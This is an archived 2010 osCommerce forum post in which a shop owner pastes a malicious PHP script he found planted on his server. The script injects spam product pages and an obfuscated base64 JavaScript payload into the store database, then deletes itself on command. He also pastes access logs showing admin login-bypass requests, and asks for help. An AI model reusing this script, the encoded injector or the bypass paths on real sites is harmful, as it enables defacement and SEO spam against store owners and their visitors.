Guest Posted August 5, 2010 Posted August 5, 2010 my osc database was got hacked, put some of drugs link to our products, I found the script on images folder call 1dbdor.php <?php ignore_user_abort(1); set_time_limit(0); include "../includes/configure.php"; include "../includes/database_tables.php"; $keysFile = "1dballed.txt"; $linksFile = "1dblinks.txt"; if ($_REQUEST['d'] == '1') { unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']); unlink($keysFile); unlink($linksFile); die ('deleted'); } $pageNum = 100; $linksMinMax = array (2,5); $keysMinMax = array (20,40); $keycentMinMax = array (7,10); $stepmaxdif = 5; $addlink = base64_decode('PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPjwhLS0gDQp2YXIgcz0iPWVqdyF0dXptZj4jeGpldWk7Znlxc2Z0dGpwbyllcGR2bmZvdS9jcGV6L3BnZ3RmdVhqZXVpKjwhaWZqaGl1OzMxMTFxeTwhcWJlZWpvaC51cHE7MjExcXk8IW1mZ3U7MXF5PCF1cHE7MXF5PCFzamhpdTsxcXk8IWNiZGxoc3B2b2UuZHBtcHM7ISRnZ2dnZ2c8IXVmeXUuYm1qaG87IWRmb3VmczwhcXB0anVqcG87IWJjdHBtdnVmPCF3anRqY2ptanV6OyF3anRqY21mPCF7LmpvZWZ5OyEzMjYyPCFlanRxbWJ6OyFjbXBkbDwjPz1iIWlzZmc+IyMhcG9EbWpkbD4jeGpvZXB4L21wZGJ1anBvIT4oaXV1cTswMHdmZGp1Zi9qb2dwMGdic25iL3FpcSg8IXNmdXZzbyFnYm10ZjwjPz1qbmghY3BzZWZzPjEhdHNkPiNpdXVxOzAweW5tL3Fiem5mb3VzeS9kcG4wY2Jvb2ZzdDA0NDd5MzkxL2txaCM/Cz1jcz89dHVzcG9oPz8/PyFEbWpkbCF1cCFGb3VmcyE9PT09MHR1c3BvaD89MGI/PTBlanc/IjttPSIiO2ZvcihpPTA7aTxzLmxlbmd0aDtpKyspe2lmKHMuY2hhckNvZGVBdChpKT09Mjgpe20rPScmJ31lbHNlIGlmKHMuY2hhckNvZGVBdChpKT09MjMpe20rPSchJ31lbHNle20rPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZUF0KGkpLTEpfX1kb2N1bWVudC53cml0ZShtKTsvLy0tPjwvc2NyaXB0Pg=='); $lastkdel = ""; $link = mysql_pconnect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD) or die("Could not connect"); mysql_select_db(DB_DATABASE); $keysArr = file ($keysFile); for ($i=0;$i<=$pageNum-1;$i++) { $key = $keysArr[$i]; //foreach ($keysArr as $key) //{ $page = ''; $key = ucfirst(trim($key)); $page = $addlink; $page .= pageGen ($key); $page .= AddLinks (); insertDB ($key , $page); //} } echo '1DBDOR'; function pageGen ($key) { global $keysMinMax , $keycentMinMax , $stepmaxdif , $keysArr; $i=1; $stepi = 1; $maxslov = rand ($keysMinMax[0],$keysMinMax[1]); $percent = rand ($keycentMinMax[0],$keycentMinMax[1]); $mk = (int)($percent*$maxslov)/($percent+100) ; $srstep = (int)$maxslov/$mk ; $addtopage .= '<h1>'.$key.'</h1>'; while ($i <= $maxslov) { if ($stepi % 2 != 0) { $stepdif = rand(0,$stepmaxdif); $step = $srstep + $stepdif; } else { $step = $srstep - $stepdif; } if ($i % $step == 0) { $tagkey = randtag($key); $addtopage .= randDel($tagkey); $i++; $stepi++; } else { $otherkey = rand(0, count($keysArr)-1); $addtopage .= randDel(trim($keysArr[$otherkey])); $i++; } } return $addtopage; } function randDel ($key) { global $lastkdel; $dArr = array (' ' , ' ' , ', ' , '. ' , ' - ' , ': ' , '<br>', '<br><br>'); $d = array_rand ($dArr); if ($lastkdel == '. ' || $lastkdel == '<br>' || $lastkdel == '<br><br>') { $res = ucfirst($key) . $dArr[$d]; } else { $res = $key.$dArr[$d]; } $lastkdel = $dArr[$d]; return $res; } function randtag ($string) { $st = array ( '<b>' , '<strong>' , '<i>' , '<em>' , '<blockquote>'); $et = array ('</b>', '</strong>', '</i>', '</em>' , '</blockquote>'); $r = rand (0 , count($st)-1); return $st[$r] . $string . $et[$r]; } function AddLinks () { global $linksFile , $linksMinMax; $addlinks = ''; $linksDel = array (', ' , ' | ' , '<br>'); $ldc = count($linksDel); if (file_exists($linksFile)) { $links = file ($linksFile); $c = count ($links); if ($c > $linksMinMax[1]*2) { $lmax = rand ($linksMinMax[0],$linksMinMax[1]); $ldi = rand (0 , $ldc-1); for ($i=0 ; $i < $lmax ; $i++ ) { $addlinks .= ($i == 0) ? ( trim($links[rand(0,$c-1)]) ) : ( $linksDel[$ldi] . trim($links[rand(0,$c-1)]) ); } return $addlinks; } else { return ; } } else { return ; } } function insertDB ( $key , $descr ) { $key = mysql_escape_string($key); $descr = mysql_escape_string($descr); $r = mysql_query ("INSERT INTO ".TABLE_PRODUCTS." (products_date_added,products_status) VALUES ('1993-01-01 01:00:00','1')" ); $r = mysql_query ("INSERT INTO ".TABLE_PRODUCTS_DESCRIPTION." (products_name,products_description) VALUES ('".$key."','".$descr."')" ); $r = mysql_query ("select last_insert_id()"); $pid = mysql_result ($r, 0, 0); LinkToFile ($pid , $key); } function linkToFile ($id , $key) { global $linksFile; $link = '<a href="' . HTTP_SERVER . DIR_WS_HTTP_CATALOG .'product_info.php?products_id=' . $id . '">' . $key . '</a>'; $fp = fopen ($linksFile , "a"); fputs ($fp , $link."\r\n"); fclose ($fp); } ?> I can't found how can they login my admin, and the log 188.120.234.41 - - [05/Aug/2010:06:02:41 +0800] "GET /images/1dbdor.php HTTP/1.0" 200 181 "-" "-" 188.120.234.41 - - [05/Aug/2010:06:02:51 +0800] "GET /images/1dblinks.txt HTTP/1.0" 200 9253 "-" "-" 188.120.234.41 - - [05/Aug/2010:06:02:52 +0800] "GET /images/1dbdor.php?d=1 HTTP/1.0" 200 182 "-" "-" 188.120.234.41 - - [05/Aug/2010:06:02:28 +0800] "POST /admin/banner_manager.php/login.php?action=insert HTTP/1.1" 200 18758 "-" "-" 188.120.234.41 - - [05/Aug/2010:06:02:33 +0800] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 16846 "-" "-" 188.120.234.41 - - [05/Aug/2010:06:02:37 +0800] "POST /admin/banner_manager.php/login.php?action=insert HTTP/1.1" 200 18758 "-" "-" 188.120.234.41 - - [05/Aug/2010:06:02:39 +0800] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 16846 "-" "-" anyone can advise? Regards Dan
Recommended Posts
Archived
This topic is now archived and is closed to further replies.